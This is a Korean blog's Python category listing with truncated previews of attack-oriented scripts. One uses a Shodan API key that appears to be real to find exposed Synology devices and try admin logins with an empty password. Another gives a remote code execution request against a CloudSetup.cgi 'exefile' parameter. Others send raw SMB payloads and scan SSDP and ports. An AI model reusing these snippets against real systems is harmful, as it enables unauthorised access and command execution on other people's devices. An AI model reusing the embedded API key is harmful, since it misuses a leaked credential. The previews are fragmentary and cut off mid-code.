목록프로그래밍/Python (37)
Self-Improvement
import shodan import requests import subprocess import re from colorama import Fore from xml.etree import ElementTree as ET SHODAN_API_KEY = 'GKja8yvDZh5B1gDF6jhz64hTJkPtOCUV' count=0 query='synology port:1900' data=(('command','login'),('username','admin'),('password','')) def shodan_query(): try: api = shodan.Shodan(SHODAN_API_KEY) result = api.search(query, page=1) #You can modify the page ex..
import requests from requests.auth import HTTPDigestAuth s = requests.Session() s.auth=HTTPDigestAuth('admin',before_pass) resp=s.get(url) # -*- coding: cp949 -*- # CVE : NCVE-2016-0045 # Description : # cgi-bin/supervisor/CloudSetup.cgi의 exefile 파라미터에서 관리자 권한으로 명령 실행이 가능한 Remote Code Execute가 발생하는 취약점 ''' ----REQUEST---- GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=id HTTP/1.1 ----RESPONSE---..
개인적 Scapy와 비교할시에 Socket은 Syn-Syn/ack-ack을 기본으로 수행을해서 편하다. import socket # smb payload = '\x00\x00\x00T\xffSMBr\x00\x00\x00\x00\x18\x01(\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00/K\x00\x00\xc5^\x001\x00\x02LANMAN1.0\x00\x02LM1.2X002\x00\x02NT LANMAN 1.0\x00\x02NT LM 0.12\x00' payload2 = '\x00\x00\x00c\xffSMBs\x00\x00\x00\x00\x18\x01 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x..
보호되어 있는 글입니다.
보호되어 있는 글입니다.
보호되어 있는 글입니다.
특정 IP가 아닌 멀티캐스트로 할시엔 239.255.255.250로 이용한다. 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182from scapy.all import *from colorama import Foreimport osimport sysimport requestsfrom bs4 import BeautifulSoup if len(sys.argv) is 1 or len(sys.argv) > 3: // 인자 개수 확인 print("Example Reference") sys...
Python 코드 12345678910from socket import * s = socket(AF_INET, SOCK_STREAM)s.settimeout(1)result=s.connect_ex(('192.168.123.7',22))s.close()if result: print("not open")else: print("open")cs192.168.123.7의 22포트에 대해 활성화가 되어있는지 확인할 시에 사용할 수있다. 실제로 192.168.123.7에는 SSH 서비스가 동작중일때 코드를 돌려보았다.
보호되어 있는 글입니다.